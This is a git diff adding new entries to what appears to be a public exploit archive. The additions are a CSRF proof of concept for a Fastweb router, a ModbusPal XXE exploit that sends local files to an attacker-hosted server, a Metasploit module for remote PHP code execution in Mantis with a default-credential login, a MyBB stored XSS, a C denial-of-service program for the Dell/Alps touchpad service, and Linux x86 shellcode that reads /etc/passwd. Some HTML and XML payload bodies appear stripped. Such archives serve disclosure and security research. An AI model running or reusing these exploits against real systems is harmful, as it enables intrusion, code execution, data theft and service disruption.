diff --git a/exploits/hardware/webapps/44606.html b/exploits/hardware/webapps/44606.html new file mode 100644 index 000000000..2c78c3c70 --- /dev/null +++ b/exploits/hardware/webapps/44606.html @@ -0,0 +1,42 @@ +# Exploit Title: Fastweb FASTgate 0.00.47 CSRF +# Date: 09-05-2018 +# Exploit Authors: Raffaele Sabato +# Contact: https://twitter.com/syrion89 +# Vendor: Fastweb +# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ +# Version: 0.00.47 +# CVE: CVE-2018-6023 + +I DESCRIPTION +======================================================================== + +An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc. +The vulnerability was disclosed to Fastweb on 19 January 2018. +Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018. + +II PROOF OF CONCEPT +======================================================================== + +## Activate Gues Wi-Fi: + + + + +
+ + + + + + + + + + +
+ + + +III REFERENCES +======================================================================== +http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/ \ No newline at end of file diff --git a/exploits/java/webapps/44607.txt b/exploits/java/webapps/44607.txt new file mode 100644 index 000000000..c2a524288 --- /dev/null +++ b/exploits/java/webapps/44607.txt @@ -0,0 +1,53 @@ +[+] Exploit Title: ModbusPal XXE Injection +[+] Date: 05-08-2018 +[+] Exploit Author: Trent Gordon +[+] Vendor Homepage: http://modbuspal.sourceforge.net/ +[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files +[+] Version: 1.6b +[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151 +[+] CVE: CVE-2018-10832 + +1. Vulnerability Description + +ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker. + +2. Proof of Concept + +a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml) + +b.) Contents of hosted "evil.xml" + + +"> + +c.) Example Exploited "xxe.xmpa" + + + + + + + +%sp; + +%param1; + +]> + +&exfil; + + + + + + + + + + + +3. Additional Details + +Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd. \ No newline at end of file diff --git a/exploits/php/remote/44611.rb b/exploits/php/remote/44611.rb new file mode 100755 index 000000000..ef2dbfc9f --- /dev/null +++ b/exploits/php/remote/44611.rb @@ -0,0 +1,124 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mantis manage_proj_page PHP Code Execution', + 'Description' => %q{ + Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote + Code Execution vulnerability in the sort parameter of the + manage_proj_page.php page. + }, + 'Author' => [ + 'EgiX', # Exploit-DB Entry Author + 'Lars Sorenson' # MSF module author + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB', '6768'], + ['CVE', '2008-4687'], + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Mantis <= 1.1.3', { } ], + ], + 'DisclosureDate' => 'Oct 16, 2008', + 'DefaultTarget' => 0)) + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']), + OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']), + OptString.new('PASSWORD', [true, 'The password to log in with', 'root']), + ]) + end + + def check + vprint_status('Checking Mantis version ...') + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'login_page.php'), + 'method' => 'GET' + }) + + unless res + vprint_error('Connection to host failed!') + return CheckCode::Unknown + end + + unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/ + vprint_error('Cannot determine Mantis version!') + return CheckCode::Unknown + end + + version = Gem::Version.new(Regexp.last_match[1]) + + vprint_status("Mantis version #{version} detected") + + if res.code == 200 && version <= Gem::Version.new('1.1.3') + return CheckCode::Appears + end + + CheckCode::Safe + end + + def login + vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login_page.php'), + }) + unless res + fail_with(Failure::Unreachable, 'Cannot access host to log in!') + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'login.php'), + 'method' => 'POST', + 'vars_post' => { + 'username': datastore['username'], + 'password': datastore['password'], + }, + 'cookie'=> "PHPSESSID=#{res.get_cookies}" + }) + unless res + fail_with(Failure::Unknown, 'Cannot access host to log in!') + end + + fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302 + fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php') + + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + res.get_cookies + end + + def exploit + fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears + + cookie = login + vprint_status('Sending payload ...') + payload_b64 = Rex::Text.encode_base64(payload.encoded) + data = { + 'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#", + } + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'), + 'method' => 'POST', + 'vars_post' => data, + 'headers' => { + 'Connection': 'close', + 'Cookie': cookie.to_s, + 'Cmd': payload_b64 + } + }) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/44608.txt b/exploits/php/webapps/44608.txt new file mode 100644 index 000000000..afd729942 --- /dev/null +++ b/exploits/php/webapps/44608.txt @@ -0,0 +1,28 @@ +# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting +# Date: 4/20/2018 +# Author: 0xB9 +# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=914 +# Version: 1.1 +# Tested on: Ubuntu 17.10 +# CVE: CVE-2018-10580 + + +1. Description: +Adds a new section to user profiles that will display their last posts. + + +2. Proof of Concept: + +Persistent XSS +- Create a thread with the following subject +- Now visit your profile to see the alert. + + +3. Solution: +I reported the plugin twice over the past 3 weeks and recieved no response. + + +The following should be added in line 236 to properly sanitize thread subjects. + +$d['tsubject'] = htmlspecialchars_uni($d['tsubject']); \ No newline at end of file diff --git a/exploits/windows/dos/44610.c b/exploits/windows/dos/44610.c new file mode 100644 index 000000000..bf24f5ee6 --- /dev/null +++ b/exploits/windows/dos/44610.c @@ -0,0 +1,112 @@ +/* +Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service +Author: Souhail Hammou +Vendor Homepage: https://www.alps.com/ +Tested on : Alps Pointing-device Driver 10.1.101.207 +CVE: CVE-2018-10828 +*/ + +#include +#include +#include + +/* +Details: +========== +ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc +allows the current user to map and write to the "ApMsgFwd File Mapping Object" section. +ApMsgFwd.exe uses the data written to the section as arguments to functions. +This causes a denial of service condition when invalid pointers are written to the mapped section. + +The crash : +=========== +(b88.aa0): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +KERNELBASE!MultiByteToWideChar+0x3d8: +00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=?? +0:004> r +rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff +rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d +rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59 + r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000 +r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000 +r14=0000000000000000 r15=0000000000563e40 +iopl=0 nv up ei pl zr na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +KERNELBASE!MultiByteToWideChar+0x3d8: +00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=?? + + +0:001> lm v m ApMsgFwd +Browse full module list +start end module name +00000000`00400000 00000000`00415000 ApMsgFwd (no symbols) + Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe + Image path: C:\Program Files\DellTPad\ApMsgFwd.exe + Image name: ApMsgFwd.exe + Browse all global symbols functions data + Timestamp: Tue Jul 1 09:03:05 2014 (53B27949) + CheckSum: 00020F5D + ImageSize: 00015000 + File version: 8.1.0.44 + Product version: 8.1.0.44 + File flags: 0 (Mask 3F) + File OS: 40004 NT Win32 + File type: 1.0 App + File date: 00000000.00000000 + Translations: 0411.04b0 + CompanyName: Alps Electric Co., Ltd. + ProductName: ApMsgFwd + InternalName: ApMsgFwd + OriginalFilename: ApMsgFwd.exe + ProductVersion: 8, 1, 0, 44 + FileVersion: 8, 1, 0, 44 + PrivateBuild: 8, 1, 0, 44 + SpecialBuild: 8, 1, 0, 44 + FileDescription: ApMsgFwd + LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd. + LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd. + Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd. +*/ +int main(int argc, char** argv) +{ + HANDLE ApMpHnd,StartEvtHnd,KeyHnd; + PBYTE MappedBuf; + + if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) ) + { + printf("OpenFileMapping Failed !\n"); + goto ret; + } + + if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) ) + { + printf("MapViewOfFile Failed !\n"); + goto cleanup_0; + } + + StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start"); + + if ( ! StartEvtHnd ) + { + printf("OpenEvent Failed !\n"); + goto cleanup_1; + } + + ZeroMemory(MappedBuf,0x1A0); + *MappedBuf = 9; //switch case 9 + *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D; + *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0; + + /*Wake up the waiting thread*/ + SetEvent(StartEvtHnd); + + CloseHandle(StartEvtHnd); +cleanup_1: + UnmapViewOfFile(MappedBuf); +cleanup_0: + CloseHandle(ApMpHnd); +ret: + return 0; +} \ No newline at end of file diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt index df89b19d3..c831b00ef 100644 --- a/exploits/windows/webapps/44497.txt +++ b/exploits/windows/webapps/44497.txt @@ -3,6 +3,8 @@ # Software Vendor: NComputing # Software Link: # Author: Javier Bernardo +# Contact: javier@kwell.net +# Website: http://www.kwell.net # CVE: CVE-2018-10201 # Category: Webapps diff --git a/files_exploits.csv b/files_exploits.csv index ebeca03fd..d44265b8c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5968,6 +5968,7 @@ id,file,description,date,author,type,platform,port 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows, 44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86, 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows, +44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16480,6 +16481,7 @@ id,file,description,date,author,type,platform,port 44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443 44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, +44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39292,3 +39294,6 @@ id,file,description,date,author,type,platform,port 44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php, 44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux, 44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php, +44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware, +44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java, +44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 3dfea168b..fbd0d2cf0 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -882,3 +882,4 @@ id,file,description,date,author,type,platform 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86 +44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/44609.c b/shellcodes/linux_x86/44609.c new file mode 100644 index 000000000..44fad83b5 --- /dev/null +++ b/shellcodes/linux_x86/44609.c @@ -0,0 +1,66 @@ +/* +; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes) +; Date : May, 2018 +; Author : Nuno Freitas +; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/ +; Twitter : @nunof11 +; SLAE ID : SLAE-1112 +; Size : 62 bytes +; Tested on : i686 GNU/Linux + +section .text + +global _start + +_start: + xor eax, eax + jmp two + +one: + pop ebx + mov al, 0x5 + int 0x80 + mov esi, eax + jmp read + +exit: + mov al, 0x1 + xor ebx, ebx + int 0x80 + +read: + mov ebx, esi + mov al, 0x3 + mov ecx, esp + mov dl, 0x01 + int 0x80 + + xor ebx, ebx + cmp eax, ebx + je exit + + mov al, 0x4 + mov bl, 0x1 + int 0x80 + + inc esp + jmp read + +two: + call one + string: db "/etc/passwd" +*/ + +#include +#include + +unsigned char shellcode[] = \ +"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; + +void main() +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file